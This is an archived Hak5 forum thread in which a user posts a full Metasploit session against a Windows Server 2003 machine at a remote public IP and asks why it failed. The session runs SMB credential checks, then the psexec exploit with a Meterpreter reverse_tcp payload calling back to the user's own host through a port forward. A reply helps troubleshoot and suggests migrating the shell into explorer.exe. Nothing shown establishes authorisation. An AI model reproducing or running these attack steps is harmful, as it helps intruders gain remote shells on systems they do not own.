Hak5 Forums

This topic is now archived and is closed to further replies.

mbarakoda

Can You Let Me Know What Is The Problem With This Exploit?

Target OS: Windows 2003 SP2 EN

Target public ip : XX.XX.XX.XX

Target Open port: 445

My OS: Windows 7

My public ip : YY.YY.YY.YY

my local ip: 192.168.2.42

my router SMC

Due to the fact that the target is not on the same LAN, and the attack will be over the internet, I started by setting up port forwarding in the router settings as follows:

Name:AUTH - Protocol:TCP/UDP - WAN Port:4444 - Server Host Port:4444 - Server IP Address 192.168.2.42

I installed Metasploit and started by checking whether the credentials are valid by running scanner/smb/smb_login as follows:

msf> use scanner/smb/smb_login

msf auxiliary(smb_login) > set rhosts XX.XX.XX.XX

rhosts => XX.XX.XX.XX

msf auxiliary(smb_login) > set smbuser root

smbuser => root

msf auxiliary(smb_login) > set smbpass password

smbpass => password

msf auxiliary(smb_login) > run

[*] XX.XX.XX.XX:445 SMB - Starting SMB login bruteforce

[-] XX.XX.XX.XX - This system allows guest sessions with any credentials, these instances will not be reported.

[-] XX.XX.XX.XX:445 SMB - [1/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : (STATUS_LOGON_FAILURE)

[-] XX.XX.XX.XX:445 SMB - [2/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : root (STATUS_LOGON_FAILURE)

[*] Auth-User: "root"

[+] XX.XX.XX.XX:445|WORKGROUP - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2) 'root' : 'password'

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Then, after the login was successful, I tried to use exploit/windows/smb/psexec to exploit the server as follows:

msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set rhost XX.XX.XX.XX

rhost => XX.XX.XX.XX

msf exploit(psexec) > set smbuser root

smbuser => root

msf exploit(psexec) > set smbpass password

smbpass => password

msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(psexec) > set lhost YY.YY.YY.YY

lhost => YY.YY.YY.YY

msf exploit(psexec) > set lport 4444

lport => 4444

msf exploit(psexec) > exploit

[-] Handler failed to bind to YY.YY.YY.YY:4444

[*] Started reverse handler on 0.0.0.0:4444

[*] Connecting to the server...

[*] Authenticating to XX.XX.XX.XX:445|WORKGROUP as user 'root'...

[*] Uploading payload...

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)

But as you can see, the exploit failed although the credentials are valid and confirmed above. Can you help me understand what's wrong with the above?

It could be that the vulnerability is already patched.

digip   
[-] Handler failed to bind to YY.YY.YY.YY:4444

What's running locally already on 4444?

Also, what OS is the target? Windows, or Linux running SMB? User root on a Windows box seems unlikely, whereas I could see it on a Linux machine running Samba, which if you think about it, I don't think psexec works on Linux as a payload, but I could be wrong.

If you got a shell popped, try migrating to a process like explorer.exe and then see where or what your commands are/can do.

I found something related to your problem, I don't know if you have seen it or not, but here's the URL.

http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
